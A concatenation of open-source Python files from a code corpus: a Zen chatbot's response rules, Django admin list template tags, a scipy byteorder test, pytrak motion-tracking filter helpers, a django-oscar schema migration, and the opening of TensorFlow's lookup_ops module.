# this breaks down when words contain these - eg 'Thyme', 'Irish'
(r'(.*)(me )|( me)|(my)|(mine)|(i)(.*)',
( "'I', 'me', 'my'... these are selfish expressions.",
"Have you ever considered that you might be a selfish person?",
"Try to consider others, not just yourself.",
"Think not just of yourself, but of others.")),
# 'you' starting a sentence
# e.g. "you stink!"
(r'you (.*)',
( "My path is not of conern to you.",
"I am but one, and you but one more.")),
# say goodbye with some extra Zen wisdom.
(r'exit',
( "Farewell. The obstacle is the path.",
"Farewell. Life is a journey, not a destination.",
"Good bye. We are cups, constantly and quietly being filled."
"\nThe trick is knowning how to tip ourselves over and let the beautiful stuff out.")),
# fall through case -
# when stumped, respond with generic zen wisdom
#
(r'(.*)',
( "When you're enlightened, every word is wisdom.",
"Random talk is useless.",
"The reverse side also has a reverse side.",
"Form is emptiness, and emptiness is form.",
"I pour out a cup of water. Is the cup empty?"))
)
zen_chatbot = Chat(responses, reflections)
def zen_chat():
print('*'*75)
print("Zen Chatbot!".center(75))
print('*'*75)
print('"Look beyond mere words and letters - look into your mind"'.center(75))
print("* Talk your way to truth with Zen Chatbot.")
print("* Type 'quit' when you have had enough.")
print('*'*75)
print("Welcome, my child.")
zen_chatbot.converse()
def demo():
zen_chat()
if __name__ == "__main__":
demo()
| mit |
ericfc/django | django/contrib/admin/templatetags/admin_list.py | 127 | 17279 | from __future__ import unicode_literals
import datetime
from django.contrib.admin.templatetags.admin_static import static
from django.contrib.admin.templatetags.admin_urls import add_preserved_filters
from django.contrib.admin.utils import (
display_for_field, display_for_value, label_for_field, lookup_field,
)
from django.contrib.admin.views.main import (
ALL_VAR, ORDER_VAR, PAGE_VAR, SEARCH_VAR,
)
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import NoReverseMatch
from django.db import models
from django.template import Library
from django.template.loader import get_template
from django.utils import formats
from django.utils.encoding import force_text
from django.utils.html import escapejs, format_html
from django.utils.safestring import mark_safe
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
register = Library()
DOT = '.'
@register.simple_tag
def paginator_number(cl, i):
"""
Generates an individual page index link in a paginated list.
"""
if i == DOT:
return '... '
elif i == cl.page_num:
return format_html('<span class="this-page">{}</span> ', i + 1)
else:
return format_html('<a href="{}"{}>{}</a> ',
cl.get_query_string({PAGE_VAR: i}),
mark_safe(' class="end"' if i == cl.paginator.num_pages - 1 else ''),
i + 1)
@register.inclusion_tag('admin/pagination.html')
def pagination(cl):
"""
Generates the series of links to the pages in a paginated list.
"""
paginator, page_num = cl.paginator, cl.page_num
pagination_required = (not cl.show_all or not cl.can_show_all) and cl.multi_page
if not pagination_required:
page_range = []
else:
ON_EACH_SIDE = 3
ON_ENDS = 2
# If there are 10 or fewer pages, display links to every page.
# Otherwise, do some fancy
if paginator.num_pages <= 10:
page_range = range(paginator.num_pages)
else:
# Insert "smart" pagination links, so that there are always ON_ENDS
# links at either end of the list of pages, and there are always
# ON_EACH_SIDE links at either end of the "current page" link.
page_range = []
if page_num > (ON_EACH_SIDE + ON_ENDS):
page_range.extend(range(0, ON_ENDS))
page_range.append(DOT)
page_range.extend(range(page_num - ON_EACH_SIDE, page_num + 1))
else:
page_range.extend(range(0, page_num + 1))
if page_num < (paginator.num_pages - ON_EACH_SIDE - ON_ENDS - 1):
page_range.extend(range(page_num + 1, page_num + ON_EACH_SIDE + 1))
page_range.append(DOT)
page_range.extend(range(paginator.num_pages - ON_ENDS, paginator.num_pages))
else:
page_range.extend(range(page_num + 1, paginator.num_pages))
need_show_all_link = cl.can_show_all and not cl.show_all and cl.multi_page
return {
'cl': cl,
'pagination_required': pagination_required,
'show_all_url': need_show_all_link and cl.get_query_string({ALL_VAR: ''}),
'page_range': page_range,
'ALL_VAR': ALL_VAR,
'1': 1,
}
def result_headers(cl):
"""
Generates the list column headers.
"""
ordering_field_columns = cl.get_ordering_field_columns()
for i, field_name in enumerate(cl.list_display):
text, attr = label_for_field(
field_name, cl.model,
model_admin=cl.model_admin,
return_attr=True
)
if attr:
# Potentially not sortable
# if the field is the action checkbox: no sorting and special class
if field_name == 'action_checkbox':
yield {
"text": text,
"class_attrib": mark_safe(' class="action-checkbox-column"'),
"sortable": False,
}
continue
admin_order_field = getattr(attr, "admin_order_field", None)
if not admin_order_field:
# Not sortable
yield {
"text": text,
"class_attrib": format_html(' class="column-{}"', field_name),
"sortable": False,
}
continue
# OK, it is sortable if we got this far
th_classes = ['sortable', 'column-{}'.format(field_name)]
order_type = ''
new_order_type = 'asc'
sort_priority = 0
sorted = False
# Is it currently being sorted on?
if i in ordering_field_columns:
sorted = True
order_type = ordering_field_columns.get(i).lower()
sort_priority = list(ordering_field_columns).index(i) + 1
th_classes.append('sorted %sending' % order_type)
new_order_type = {'asc': 'desc', 'desc': 'asc'}[order_type]
# build new ordering param
o_list_primary = [] # URL for making this field the primary sort
o_list_remove = [] # URL for removing this field from sort
o_list_toggle = [] # URL for toggling order type for this field
make_qs_param = lambda t, n: ('-' if t == 'desc' else '') + str(n)
for j, ot in ordering_field_columns.items():
if j == i: # Same column
param = make_qs_param(new_order_type, j)
# We want clicking on this header to bring the ordering to the
# front
o_list_primary.insert(0, param)
o_list_toggle.append(param)
# o_list_remove - omit
else:
param = make_qs_param(ot, j)
o_list_primary.append(param)
o_list_toggle.append(param)
o_list_remove.append(param)
if i not in ordering_field_columns:
o_list_primary.insert(0, make_qs_param(new_order_type, i))
yield {
"text": text,
"sortable": True,
"sorted": sorted,
"ascending": order_type == "asc",
"sort_priority": sort_priority,
"url_primary": cl.get_query_string({ORDER_VAR: '.'.join(o_list_primary)}),
"url_remove": cl.get_query_string({ORDER_VAR: '.'.join(o_list_remove)}),
"url_toggle": cl.get_query_string({ORDER_VAR: '.'.join(o_list_toggle)}),
"class_attrib": format_html(' class="{}"', ' '.join(th_classes)) if th_classes else '',
}
def _boolean_icon(field_val):
icon_url = static('admin/img/icon-%s.gif' %
{True: 'yes', False: 'no', None: 'unknown'}[field_val])
return format_html('<img src="{}" alt="{}" />', icon_url, field_val)
def items_for_result(cl, result, form):
"""
Generates the actual list of data.
"""
def link_in_col(is_first, field_name, cl):
if cl.list_display_links is None:
return False
if is_first and not cl.list_display_links:
return True
return field_name in cl.list_display_links
first = True
pk = cl.lookup_opts.pk.attname
for field_name in cl.list_display:
empty_value_display = cl.model_admin.get_empty_value_display()
row_classes = ['field-%s' % field_name]
try:
f, attr, value = lookup_field(field_name, result, cl.model_admin)
except ObjectDoesNotExist:
result_repr = empty_value_display
else:
empty_value_display = getattr(attr, 'empty_value_display', empty_value_display)
if f is None or f.auto_created:
if field_name == 'action_checkbox':
row_classes = ['action-checkbox']
allow_tags = getattr(attr, 'allow_tags', False)
boolean = getattr(attr, 'boolean', False)
if boolean or not value:
allow_tags = True
result_repr = display_for_value(value, empty_value_display, boolean)
# Strip HTML tags in the resulting text, except if the
# function has an "allow_tags" attribute set to True.
if allow_tags:
result_repr = mark_safe(result_repr)
if isinstance(value, (datetime.date, datetime.time)):
row_classes.append('nowrap')
else:
if isinstance(f.remote_field, models.ManyToOneRel):
field_val = getattr(result, f.name)
if field_val is None:
result_repr = empty_value_display
else:
result_repr = field_val
else:
result_repr = display_for_field(value, f, empty_value_display)
if isinstance(f, (models.DateField, models.TimeField, models.ForeignKey)):
row_classes.append('nowrap')
if force_text(result_repr) == '':
result_repr = mark_safe(' ')
row_class = mark_safe(' class="%s"' % ' '.join(row_classes))
# If list_display_links not defined, add the link tag to the first field
if link_in_col(first, field_name, cl):
table_tag = 'th' if first else 'td'
first = False
# Display link to the result's change_view if the url exists, else
# display just the result's representation.
try:
url = cl.url_for_result(result)
except NoReverseMatch:
link_or_text = result_repr
else:
url = add_preserved_filters({'preserved_filters': cl.preserved_filters, 'opts': cl.opts}, url)
# Convert the pk to something that can be used in Javascript.
# Problem cases are long ints (23L) and non-ASCII strings.
if cl.to_field:
attr = str(cl.to_field)
else:
attr = pk
value = result.serializable_value(attr)
result_id = escapejs(value)
link_or_text = format_html(
'<a href="{}"{}>{}</a>',
url,
format_html(
' onclick="opener.dismissRelatedLookupPopup(window, '
''{}'); return false;"', result_id
) if cl.is_popup else '',
result_repr)
yield format_html('<{}{}>{}</{}>',
table_tag,
row_class,
link_or_text,
table_tag)
else:
# By default the fields come from ModelAdmin.list_editable, but if we pull
# the fields out of the form instead of list_editable custom admins
# can provide fields on a per request basis
if (form and field_name in form.fields and not (
field_name == cl.model._meta.pk.name and
form[cl.model._meta.pk.name].is_hidden)):
bf = form[field_name]
result_repr = mark_safe(force_text(bf.errors) + force_text(bf))
yield format_html('<td{}>{}</td>', row_class, result_repr)
if form and not form[cl.model._meta.pk.name].is_hidden:
yield format_html('<td>{}</td>', force_text(form[cl.model._meta.pk.name]))
class ResultList(list):
# Wrapper class used to return items in a list_editable
# changelist, annotated with the form object for error
# reporting purposes. Needed to maintain backwards
# compatibility with existing admin templates.
def __init__(self, form, *items):
self.form = form
super(ResultList, self).__init__(*items)
def results(cl):
if cl.formset:
for res, form in zip(cl.result_list, cl.formset.forms):
yield ResultList(form, items_for_result(cl, res, form))
else:
for res in cl.result_list:
yield ResultList(None, items_for_result(cl, res, None))
def result_hidden_fields(cl):
if cl.formset:
for res, form in zip(cl.result_list, cl.formset.forms):
if form[cl.model._meta.pk.name].is_hidden:
yield mark_safe(force_text(form[cl.model._meta.pk.name]))
@register.inclusion_tag("admin/change_list_results.html")
def result_list(cl):
"""
Displays the headers and data list together
"""
headers = list(result_headers(cl))
num_sorted_fields = 0
for h in headers:
if h['sortable'] and h['sorted']:
num_sorted_fields += 1
return {'cl': cl,
'result_hidden_fields': list(result_hidden_fields(cl)),
'result_headers': headers,
'num_sorted_fields': num_sorted_fields,
'results': list(results(cl))}
@register.inclusion_tag('admin/date_hierarchy.html')
def date_hierarchy(cl):
"""
Displays the date hierarchy for date drill-down functionality.
"""
if cl.date_hierarchy:
field_name = cl.date_hierarchy
field = cl.opts.get_field(field_name)
dates_or_datetimes = 'datetimes' if isinstance(field, models.DateTimeField) else 'dates'
year_field = '%s__year' % field_name
month_field = '%s__month' % field_name
day_field = '%s__day' % field_name
field_generic = '%s__' % field_name
year_lookup = cl.params.get(year_field)
month_lookup = cl.params.get(month_field)
day_lookup = cl.params.get(day_field)
link = lambda filters: cl.get_query_string(filters, [field_generic])
if not (year_lookup or month_lookup or day_lookup):
# select appropriate start level
date_range = cl.queryset.aggregate(first=models.Min(field_name),
last=models.Max(field_name))
if date_range['first'] and date_range['last']:
if date_range['first'].year == date_range['last'].year:
year_lookup = date_range['first'].year
if date_range['first'].month == date_range['last'].month:
month_lookup = date_range['first'].month
if year_lookup and month_lookup and day_lookup:
day = datetime.date(int(year_lookup), int(month_lookup), int(day_lookup))
return {
'show': True,
'back': {
'link': link({year_field: year_lookup, month_field: month_lookup}),
'title': capfirst(formats.date_format(day, 'YEAR_MONTH_FORMAT'))
},
'choices': [{'title': capfirst(formats.date_format(day, 'MONTH_DAY_FORMAT'))}]
}
elif year_lookup and month_lookup:
days = cl.queryset.filter(**{year_field: year_lookup, month_field: month_lookup})
days = getattr(days, dates_or_datetimes)(field_name, 'day')
return {
'show': True,
'back': {
'link': link({year_field: year_lookup}),
'title': str(year_lookup)
},
'choices': [{
'link': link({year_field: year_lookup, month_field: month_lookup, day_field: day.day}),
'title': capfirst(formats.date_format(day, 'MONTH_DAY_FORMAT'))
} for day in days]
}
elif year_lookup:
months = cl.queryset.filter(**{year_field: year_lookup})
months = getattr(months, dates_or_datetimes)(field_name, 'month')
return {
'show': True,
'back': {
'link': link({}),
'title': _('All dates')
},
'choices': [{
'link': link({year_field: year_lookup, month_field: month.month}),
'title': capfirst(formats.date_format(month, 'YEAR_MONTH_FORMAT'))
} for month in months]
}
else:
years = getattr(cl.queryset, dates_or_datetimes)(field_name, 'year')
return {
'show': True,
'choices': [{
'link': link({year_field: str(year.year)}),
'title': str(year.year),
} for year in years]
}
@register.inclusion_tag('admin/search_form.html')
def search_form(cl):
"""
Displays a search form for searching the list.
"""
return {
'cl': cl,
'show_result_count': cl.result_count != cl.full_result_count,
'search_var': SEARCH_VAR
}
@register.simple_tag
def admin_list_filter(cl, spec):
tpl = get_template(spec.template)
return tpl.render({
'title': spec.title,
'choices': list(spec.choices(cl)),
'spec': spec,
})
@register.inclusion_tag('admin/actions.html', takes_context=True)
def admin_actions(context):
"""
Track the number of times the action field has been rendered on the page,
so we know which value to use.
"""
context['action_index'] = context.get('action_index', -1) + 1
return context
| bsd-3-clause |
njwilson23/scipy | scipy/io/matlab/tests/test_byteordercodes.py | 126 | 1044 | ''' Tests for byteorder module '''
from __future__ import division, print_function, absolute_import
import sys
from numpy.testing import assert_raises, assert_, run_module_suite
import scipy.io.matlab.byteordercodes as sibc
def test_native():
native_is_le = sys.byteorder == 'little'
assert_(sibc.sys_is_le == native_is_le)
def test_to_numpy():
if sys.byteorder == 'little':
assert_(sibc.to_numpy_code('native') == '<')
assert_(sibc.to_numpy_code('swapped') == '>')
else:
assert_(sibc.to_numpy_code('native') == '>')
assert_(sibc.to_numpy_code('swapped') == '<')
assert_(sibc.to_numpy_code('native') == sibc.to_numpy_code('='))
assert_(sibc.to_numpy_code('big') == '>')
for code in ('little', '<', 'l', 'L', 'le'):
assert_(sibc.to_numpy_code(code) == '<')
for code in ('big', '>', 'b', 'B', 'be'):
assert_(sibc.to_numpy_code(code) == '>')
assert_raises(ValueError, sibc.to_numpy_code, 'silly string')
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause |
lindemann09/pytrak | pytrak/analysis/movement_analysis.py | 1 | 2267 | """helpful functions to analyses pytrak data"""
__author__ = "Oliver Lindemann"
from scipy import signal
import numpy as np
def inch2cm(data):
"""converts numpy data in inch to cm"""
return data * 2.54
def velocity(data, timestamps):
"""calculates velocity of data for all sensors
data in cm, timestamps in ms
velocity in m/sec
"""
diff_meter = (data[:, 0:-1, :]-data[:, 1:,:])/100.0
dist = np.sqrt(np.sum(diff_meter**2, axis=2))
tdiff = np.diff(timestamps)/1000.0
velocity = map(lambda x: np.concatenate(([0], x/tdiff)),
dist)
return np.transpose(np.array(velocity))
def estimate_sample_rate(timestamps):
"""estimates to sampling rate in hz for the timestamps"""
return 1000.0/np.mean(np.diff(timestamps))
## data filtering
def butter_lowpass(lowcut, sample_rate, order=3):
"""design lowpass filter
Sample rate and desired cutoff frequencies (in Hz).
"""
nyq = 0.5 * sample_rate
low = lowcut / nyq
b, a = signal.butter(N=order, Wn=low, btype='lowpass')
return b, a
def butter_lowpass_filter(data, lowcut=10, order=3,
sample_rate=None):
"""filter data of all sensors"""
print "filtering data"
if sample_rate is None:
sample_rate = estimate_sample_rate(data)
b, a = butter_lowpass(lowcut, sample_rate, order=order)
filtered = map(lambda x: signal.lfilter(b, a, x), data)
return np.array(filtered)
def moving_average_filter(data, window_size=5):
"""moving average filter / running mean
Note
-----
see http://stackoverflow.com/questions/13728392/moving-average-or-running-mean
or http://stackoverflow.com/questions/11352047/finding-moving-average-from-data-points-in-python
"""
window= np.ones(int(window_size))/float(window_size)
ma_filter = lambda x : np.convolve(x, window, 'same')
dim = np.shape(data)
for s in range(dim[0]):
for x in range(dim[2]):
first_values = np.copy(data[s,:window_size:,x])
last_values = np.copy(data[s,-window_size:,x])
data[s,:,x] = ma_filter(data[s,:,x])
data[s,:window_size:,x] = first_values
data[s,-window_size:,x] = last_values
return np.array(data) | gpl-3.0 |
Idematica/django-oscar | oscar/apps/offer/migrations/0021_auto__chg_field_benefit_type__chg_field_conditionaloffer_description.py | 17 | 16561 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'Benefit.type'
db.alter_column('offer_benefit', 'type', self.gf('django.db.models.fields.CharField')(default='', max_length=128))
# Changing field 'ConditionalOffer.description'
db.alter_column('offer_conditionaloffer', 'description', self.gf('django.db.models.fields.TextField')(default=''))
def backwards(self, orm):
# Changing field 'Benefit.type'
db.alter_column('offer_benefit', 'type', self.gf('django.db.models.fields.CharField')(max_length=128, null=True))
# Changing field 'ConditionalOffer.description'
db.alter_column('offer_conditionaloffer', 'description', self.gf('django.db.models.fields.TextField')(null=True))
models = {
'catalogue.attributeentity': {
'Meta': {'object_name': 'AttributeEntity'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'blank': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'entities'", 'to': "orm['catalogue.AttributeEntityType']"})
},
'catalogue.attributeentitytype': {
'Meta': {'object_name': 'AttributeEntityType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'blank': 'True'})
},
'catalogue.attributeoption': {
'Meta': {'object_name': 'AttributeOption'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'options'", 'to': "orm['catalogue.AttributeOptionGroup']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'option': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'catalogue.attributeoptiongroup': {
'Meta': {'object_name': 'AttributeOptionGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'catalogue.category': {
'Meta': {'ordering': "['full_name']", 'object_name': 'Category'},
'depth': ('django.db.models.fields.PositiveIntegerField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'full_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'numchild': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'})
},
'catalogue.option': {
'Meta': {'object_name': 'Option'},
'code': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'Required'", 'max_length': '128'})
},
'catalogue.product': {
'Meta': {'ordering': "['-date_created']", 'object_name': 'Product'},
'attributes': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.ProductAttribute']", 'through': "orm['catalogue.ProductAttributeValue']", 'symmetrical': 'False'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Category']", 'through': "orm['catalogue.ProductCategory']", 'symmetrical': 'False'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_discountable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'variants'", 'null': 'True', 'to': "orm['catalogue.Product']"}),
'product_class': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.ProductClass']", 'null': 'True'}),
'product_options': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}),
'rating': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'recommended_products': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Product']", 'symmetrical': 'False', 'through': "orm['catalogue.ProductRecommendation']", 'blank': 'True'}),
'related_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'relations'", 'blank': 'True', 'to': "orm['catalogue.Product']"}),
'score': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}),
'status': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '128', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'upc': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
'catalogue.productattribute': {
'Meta': {'ordering': "['code']", 'object_name': 'ProductAttribute'},
'code': ('django.db.models.fields.SlugField', [], {'max_length': '128'}),
'entity_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeEntityType']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'option_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeOptionGroup']", 'null': 'True', 'blank': 'True'}),
'product_class': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'attributes'", 'null': 'True', 'to': "orm['catalogue.ProductClass']"}),
'required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '20'})
},
'catalogue.productattributevalue': {
'Meta': {'object_name': 'ProductAttributeValue'},
'attribute': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.ProductAttribute']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'attribute_values'", 'to': "orm['catalogue.Product']"}),
'value_boolean': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'value_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'value_entity': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeEntity']", 'null': 'True', 'blank': 'True'}),
'value_float': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'value_integer': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'value_option': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeOption']", 'null': 'True', 'blank': 'True'}),
'value_richtext': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'value_text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
'catalogue.productcategory': {
'Meta': {'ordering': "['-is_canonical']", 'object_name': 'ProductCategory'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Category']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_canonical': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']"})
},
'catalogue.productclass': {
'Meta': {'ordering': "['name']", 'object_name': 'ProductClass'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'options': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}),
'requires_shipping': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
'track_stock': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'catalogue.productrecommendation': {
'Meta': {'object_name': 'ProductRecommendation'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'primary': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'primary_recommendations'", 'to': "orm['catalogue.Product']"}),
'ranking': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'recommendation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']"})
},
'offer.benefit': {
'Meta': {'object_name': 'Benefit'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_affected_items': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'range': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Range']", 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'value': ('oscar.models.fields.PositiveDecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'})
},
'offer.condition': {
'Meta': {'object_name': 'Condition'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'range': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Range']", 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'value': ('oscar.models.fields.PositiveDecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'})
},
'offer.conditionaloffer': {
'Meta': {'ordering': "['-priority']", 'object_name': 'ConditionalOffer'},
'benefit': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Benefit']"}),
'condition': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Condition']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'end_datetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_basket_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'max_discount': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'max_global_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'max_user_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'num_applications': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'num_orders': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'offer_type': ('django.db.models.fields.CharField', [], {'default': "'Site'", 'max_length': '128'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'redirect_url': ('oscar.models.fields.ExtendedURLField', [], {'max_length': '200', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128', 'unique': 'True', 'null': 'True'}),
'start_datetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Open'", 'max_length': '64'}),
'total_discount': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
},
'offer.range': {
'Meta': {'object_name': 'Range'},
'classes': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'classes'", 'blank': 'True', 'to': "orm['catalogue.ProductClass']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'excluded_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'excludes'", 'blank': 'True', 'to': "orm['catalogue.Product']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'included_categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'includes'", 'blank': 'True', 'to': "orm['catalogue.Category']"}),
'included_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'includes'", 'blank': 'True', 'to': "orm['catalogue.Product']"}),
'includes_all_products': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['offer'] | bsd-3-clause |
Moriadry/tensorflow | tensorflow/contrib/lookup/lookup_ops.py | 47 | 26456 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Lookup table operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import gen_lookup_ops
from tensorflow.python.ops import lookup_ops
# pylint: disable=unused-import
from tensorflow.python.ops.lookup_ops import FastHashSpec
